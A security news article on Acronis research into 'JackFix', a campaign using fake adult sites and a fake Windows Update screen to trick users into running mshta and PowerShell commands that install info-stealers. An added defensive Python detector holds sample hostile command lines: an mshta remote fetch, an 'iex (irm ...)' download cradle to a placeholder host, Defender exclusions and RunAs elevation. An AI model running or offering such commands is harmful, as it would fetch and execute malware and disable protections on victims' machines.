CYBERSECURITY | Fake adult sites spoof Windows Update to drop multi-stealer malware — Acronis


A new browser-based attack chain is abusing fake adult websites and a full-screen “Windows Update” page to trick users into running commands that install multiple info-stealing malware families on their PCs, according to research by Acronis Threat Research Unit (TRU).

In a report authored by Acronis TRU researcher Eliad Kimhy, the company describes a novel variation of so-called ClickFix attacks, in which victims are socially engineered into copying and executing attacker-supplied commands. The campaign combines an adult-content lure with a realistic, browser-rendered Windows Update screen that appears after the victim clicks anywhere on the fake site.

Once the victim follows the on-screen instructions, the attack chain delivers several well-known stealers and remote access tools, including recent versions of Rhadamanthys, Vidar 2.0, RedLine and Amadey, along with multiple loaders and additional payloads.

Kimhy and the Acronis TRU team refer to this screen-hijacking ClickFix method as “JackFix,” noting that it merges old-school screen-locker tactics with modern fileless and PowerShell-based malware techniques.

Adult-themed lures and a fake Windows Update screen

Unlike many ClickFix or phishing attacks that start with an email claiming an account problem or billing issue, this campaign begins with fake adult sites designed to mimic platforms such as xHamster, Pornhub and smaller “free porn” portals.

Acronis says it is highly likely that traffic to these clones originates from malvertising on shady or adult-focused websites, although the same links could also be pushed via email, private messages or forums. In some early variants, the pages display explicit images posing as playable videos. More recent versions show a blurred adult-style background with a prominent age-verification prompt and a browser notification request.

“The site itself, or in our case, the site’s subject matter, is lure enough,” Kimhy writes, pointing out that victims are not forced to visit the page but choose to click into it.

Any interaction with the fake site — clicking an age gate, a play button or even the notification pop-up — triggers JavaScript that forces the browser into full-screen mode and overlays a blue Windows Update screen. The HTML- and CSS-based page closely imitates the look of a genuine update process, including a blue background, white system-style text, a spinning “waiting” animation and percentage counters that appear to show several “Critical Windows Security Updates” being installed.

At the end of the fake update, the page displays detailed instructions that walk the victim through opening Windows’ Run dialog or PowerShell and pasting in a command provided by the attacker. This is the core of the ClickFix technique.

To increase pressure and limit escape routes, the script attempts to block common keyboard shortcuts such as Esc, F11, F12 and F5. Acronis notes that this lockout is not fully effective in current versions of major browsers, but it can still confuse or trap less experienced users, especially in the context of an adult site suddenly demanding immediate security updates.

Three-stage, heavily obfuscated attack chain

If the victim executes the supplied command, a three-stage infection flow begins.

In most cases, the first stage starts with an mshta command. Earlier versions of the campaign exposed this payload in plain text on the phishing page. Later iterations now obfuscate both the payload and the ClickFix logic using hex-encoded arrays and character-code functions, making it more difficult for defenders to detect suspicious clipboard or command strings with basic scanning.

The mshta call reaches a remote URL that typically ends with an .odd file. Initially, those files contained relatively simple JavaScript that invoked PowerShell to download another script using commands such as irm or iwr. In current samples, the .odd files are padded with junk functions and unused code, and the active payload is buried in a CharCode or Base64-encoded block at the bottom.

When contacted directly through a browser, these attacker-controlled URLs redirect to benign destinations like Google or Steam. Only when accessed via the specific PowerShell command do they return the malicious second-stage script. Acronis says this behavior helps the infrastructure avoid detection and analysis on platforms such as VirusTotal, which see only the harmless redirection.

The second-stage payload is a large, heavily obfuscated PowerShell script, often tens of thousands of characters long and in some cases reaching up to 13 MB. It contains numerous randomly named variables and functions that are never called, as well as comments that appear to mark sections of automatically generated anti-analysis code. Acronis suggests the attackers are using an obfuscation tool, and possibly even AI-generated filler code, to complicate static analysis.

Early in its execution, the script attempts to create extensive exclusions in Microsoft Defender, covering folders, file paths and even IP addresses associated with the attack. It then spawns a new PowerShell process and tries to elevate its privileges by invoking the -Verb RunAs option, which triggers Windows’ User Account Control prompt.

From the victim’s perspective, after they run the supposed security-update commands, they are bombarded with repeated UAC dialogs asking for permission to allow PowerShell to run with administrator rights. The script loops until the user clicks “Yes,” effectively making the machine difficult to use unless they comply or forcibly interrupt the process via actions such as Ctrl+Alt+Delete.

Once elevated, the second-stage script either decrypts an embedded payload — stored as a large Base64 blob and protected with XOR or AES — and loads it directly into memory, or acts as a downloader that fetches multiple executables from command-and-control servers.

In the downloader scenario, a single infection can launch up to eight distinct payloads. Acronis observed one sample that subsequently downloaded and executed 14 additional tools and malware. The researchers describe this as one of the most extreme cases of “spray and prey” they have encountered, noting that the operators may be testing different malware families and ensuring that at least one successfully evades defenses.
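The following is an added example, not code from the Acronis report or from TechSabado: a small detection routine that tags process-creation events matching the stages described above (mshta fetching a remote URL, a PowerShell download cradle using irm/iwr, Defender exclusion changes, and -Verb RunAs elevation) and links them through the parent-process chain. The event records and the `cdn.example.invalid` host are constructed for illustration; the field names are assumed to mimic a Sysmon-style process-creation log.

```python
import re

# Constructed sample process-creation events (not real telemetry from the report).
# Fields mimic a Sysmon Event ID 1 style record: pid, parent pid, image, command line.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    # Stage 1: the command the victim pasted into the Run dialog (placeholder host)
    {"pid": 200, "ppid": 100, "image": "mshta.exe",
     "cmd": "mshta https://cdn.example.invalid/update/win.odd"},
    # Stage 2: mshta's script invokes a PowerShell download cradle
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (irm https://cdn.example.invalid/s2)"'},
    # Defender exclusions and a UAC elevation request from the stage-2 script
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmd": 'powershell -c "Add-MpPreference -ExclusionPath C:\\Users\\Public; '
            "Start-Process powershell -Verb RunAs -ArgumentList '-enc AAAA'\""},
    # Benign noise: an admin launching a local HTA, which should not be tagged
    {"pid": 500, "ppid": 100, "image": "mshta.exe", "cmd": "mshta C:\\tools\\menu.hta"},
]

# (tag, image substring, case-insensitive command-line pattern)
RULES = [
    ("mshta_remote_url", "mshta", r"https?://\S+"),
    ("ps_download_cradle", "powershell", r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b"),
    ("defender_exclusion", "powershell", r"add-mppreference\s+-exclusion"),
    ("uac_elevation", "powershell", r"-verb\s+runas"),
]


def tag_event(ev):
    """Return the rule tags whose image and command-line pattern both match this event."""
    return [tag for tag, image, pat in RULES
            if image in ev["image"].lower() and re.search(pat, ev["cmd"], re.I)]


def is_clickfix_chain(events):
    """True if a remote-URL mshta process has a PowerShell descendant matching any
    stage-2 rule, i.e. the mshta -> PowerShell chain described in the article."""
    by_pid = {ev["pid"]: ev for ev in events}

    def ancestors(ev):
        while ev["ppid"] in by_pid:          # stops at the root (ppid not in the log)
            ev = by_pid[ev["ppid"]]
            yield ev

    for ev in events:
        tags = tag_event(ev)
        if not tags or "mshta_remote_url" in tags:
            continue                          # only stage-2 hits are chain candidates
        if any("mshta_remote_url" in tag_event(a) for a in ancestors(ev)):
            return True
    return False
```

A single tag such as a Defender exclusion change can be legitimate admin activity; the chain check is what raises confidence, so alert on `is_clickfix_chain` and log the individual tags for triage.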

Strange code artifacts and defensive guidance

While tracking the campaign over several months, Acronis researchers also found unusual remnants in the phishing site’s source code.

Early versions included developer comments written in Russian, hinting that at least some of the developers are Russian-speaking. Other commented-out sections referenced a hidden Shockwave Flash component named pu.swf, suggesting that the template may have roots in older exploit kits from the pre-2020 Flash era, later updated with ClickFix logic.

More striking is a commented text block quoting a 2003 United Nations Security Council discussion about disarming armed groups during the Bougainville peace process. The snippet reads, in part: “With regard to stage III, we highly recommend the complete destruction of all weapons, as a lasting peace cannot be ensured otherwise.”

The passage is never displayed to visitors but appears consistently across recent site versions. Acronis notes that it is unclear whether this is an intentional message, an internal joke, a distraction for analysts or simply leftover code from an unknown earlier project.

Despite the oddities, the researchers emphasize that the campaign demonstrates a sophisticated blend of social engineering, browser-based deception and multi-stage, fileless execution that can cause serious damage if allowed to run fully. Compromised systems risk the theft of credentials, cryptocurrency wallets and other sensitive data, as well as potential lateral movement through RATs and loaders.

Acronis says its XDR platform blocks the attack once the malicious PowerShell script executes, preventing later stages from deploying additional malware.

For security teams, Acronis recommends renewed user education focused on any scenario where users are asked to paste commands into PowerShell, cmd or the Run dialog, even when the surrounding interface looks like a legitimate Windows component. Organizations should also consider restricting or monitoring PowerShell, cmd and mshta usage for users who do not need these tools, and should focus on detecting suspicious command-line activity and fileless malware techniques.

By reviving the psychology of early screen-locker malware and combining it with modern ClickFix methods and adult-content lures, the “JackFix” campaign underscores how attackers continue evolving proven tricks into more flexible and convincing social-engineering tools.

by TechSabado.com editors